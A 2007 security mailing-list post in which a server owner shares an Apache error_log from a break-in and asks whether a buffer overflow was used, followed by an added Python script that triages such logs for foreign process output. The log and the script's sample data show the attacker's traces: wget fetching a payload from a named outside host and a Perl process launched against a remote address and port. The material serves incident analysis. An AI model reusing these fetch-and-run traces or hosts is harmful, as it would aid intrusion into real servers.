Security Basics mailing list archives

Analysis of an Apache log following a hack.


From: Gregory Boddin <gregory () g2f be>
Date: Tue, 10 Apr 2007 12:11:58 +0200

Hello, this is my first mail to the SecurityFocus mailing list.
First, thanks for this community and your attention.

Well, my server was hacked 1 week ago, and I found this in the Apache error_log.

The system was cleaned after that, but I want to know more about this.

I think that someone has used a buffer overflow in the httpd (Apache) server.

Can you confirm that?

Thank you very much for your answer.

(Excuse my English, because I'm French.)

[APACHE ERROR LOG]
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@*****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
          => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

0K .......... .......... ...... 100% 41.93 KB/s

00:05:37 (41.93 KB/s) - `b' saved [27606/27606]

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 5315 0 0:00:05 0:00:05 --:--:-- 72383
sh: lynx: command not found
sh: fetch: command not found
--00:22:32--  http://www.r00ting.org/b
          => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

0K .......... .......... ...... 100% 58.23 KB/s

00:22:34 (58.23 KB/s) - `b' saved [27606/27606]

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 27606 100 27606 0 0 33291 0 --:--:-- --:--:-- --:--:-- 60817
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1: 5148 Killed perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations
[Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sh: /cd: No such file or directory
[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not exit, sending a SIGTERM
[Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not exit, sending a SIGTERM
[Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal operations
[Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down
[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal operations
[Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down
[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal operations
[Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
[/APACHE ERROR LOG]

Thank you.

Greg
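Editor's note, with an added example that is not part of the original post. The useful property of the log above is that it mixes two kinds of lines: native httpd entries, which always start with `[Day Mon DD HH:MM:SS YYYY] [level]`, and everything else (wget and curl progress output, `sh: ... command not found`, a Perl runtime error, a `Killed` process line, PHP's memory-limit message). httpd never writes those itself; they are the stderr of a process the server spawned, which inherits error_log as its stderr. Separating the two classes and extracting the indicators from the foreign lines (what was downloaded, from where, what was executed, which address and port it was pointed at) is the first triage step, and the timestamps of the native entries around them give the window to correlate against access_log. The script below does that. Function names (`triage`, `split_entries`, `summarize`, `remote_endpoints`) and the indicator patterns are my own, the sample log is constructed from the lines in the post, and it assumes Python 3.7 or later (splitting on a zero-width pattern).

```python
"""Triage an Apache error_log for output that httpd itself never writes.

Native error_log entries look like "[Day Mon DD HH:MM:SS YYYY] [level] msg".
Anything else in the file is stderr from a process the server spawned (CGI,
PHP, a shell). Separating the two and pulling indicators out of the foreign
lines is the first step in reconstructing what ran under the httpd user.
Added example, not from the original post. Requires Python 3.7+.
"""
import re
from collections import Counter

# Start of a native httpd entry; the boundary variant splits entries that were
# concatenated onto one physical line (as in the post's log).
ENTRY_START = re.compile(
    r'\[[A-Z][a-z]{2} [A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2} \d{4}\] \[\w+\] ')
ENTRY_BOUNDARY = re.compile(
    r'(?=\[[A-Z][a-z]{2} [A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2} \d{4}\] \[)')

# Indicator patterns (assumed set). Each defines a "detail" group; anchored
# patterns only hit foreign lines, unanchored ones also catch text appended
# to a native entry.
INDICATORS = [
    ("shell_error",   re.compile(r'^sh: (?P<detail>.*)$')),
    ("download",      re.compile(r'^--\d{2}:\d{2}:\d{2}--\s+(?P<detail>\S+)')),
    ("resolved_host", re.compile(r'^Resolving (?P<detail>\S+?)\.\.\. \d{1,3}(?:\.\d{1,3}){3}')),
    ("file_saved",    re.compile(r"`(?P<detail>[^']+)' saved \[\d+/\d+\]")),
    ("killed_proc",   re.compile(r'Killed\s+(?P<detail>.+?)\s+2>&1')),
    ("perl_error",    re.compile(r'called at (?P<detail>\S+) line \d+\.$')),
    ("php_error",     re.compile(r'(?P<detail>Allowed memory size of \d+ bytes exhausted)')),
    ("mail_error",    re.compile(r'(?P<detail>sendmail: (?:warning|fatal): .*)$')),
]

HOST_IP = re.compile(r'^Resolving (?P<host>\S+?)\.\.\. (?P<ip>\d{1,3}(?:\.\d{1,3}){3})')
IP_PORT = re.compile(r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{2,5})\b')

# Constructed sample, modelled on the lines quoted in the post.
SAMPLE_ERROR_LOG = """\
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
          => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1: 5148 Killed perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations [Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory
"""


def split_entries(line):
    """Split one physical line into log entries (handles concatenated entries)."""
    return [p.strip() for p in ENTRY_BOUNDARY.split(line) if p.strip()]


def triage(log_text):
    """Classify every entry as native or foreign and collect indicator hits.

    Returns {"native": int, "foreign": [str], "findings": [(kind, detail, entry)]}.
    """
    native, foreign, findings = 0, [], []
    for raw in log_text.splitlines():
        for entry in split_entries(raw):
            m = ENTRY_START.match(entry)
            if m:
                native += 1
                text = entry[m.end():]      # message part of a native entry
            else:
                foreign.append(entry)       # stderr of a spawned process
                text = entry
            for kind, pattern in INDICATORS:
                hit = pattern.search(text)
                if hit:
                    findings.append((kind, hit.group("detail"), entry))
    return {"native": native, "foreign": foreign, "findings": findings}


def summarize(result):
    """Count findings per indicator kind."""
    return Counter(kind for kind, _, _ in result["findings"])


def remote_endpoints(findings):
    """Hosts the spawned process talked to: download URLs, resolved hosts and
    the address/port pairs passed on the killed command line."""
    endpoints = set()
    for kind, detail, entry in findings:
        if kind == "download":
            endpoints.add(detail)
        elif kind == "resolved_host":
            m = HOST_IP.match(entry)
            endpoints.add(f"{m.group('host')} ({m.group('ip')})")
        elif kind == "killed_proc":
            for m in IP_PORT.finditer(detail):
                endpoints.add(f"{m.group('ip')}:{m.group('port')}")
    return sorted(endpoints)


if __name__ == "__main__":
    result = triage(SAMPLE_ERROR_LOG)
    print(f"native httpd entries: {result['native']}, foreign lines: {len(result['foreign'])}")
    for kind, count in sorted(summarize(result).items()):
        print(f"  {kind:14} {count}")
    print("remote endpoints:", ", ".join(remote_endpoints(result["findings"])))
```

Run against a real error_log, the foreign lines and their surrounding native timestamps are what to take to access_log: the requests served in that window by the same child processes are where the question of how the process was spawned gets answered, and that is a different question from whether httpd itself was overflowed.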

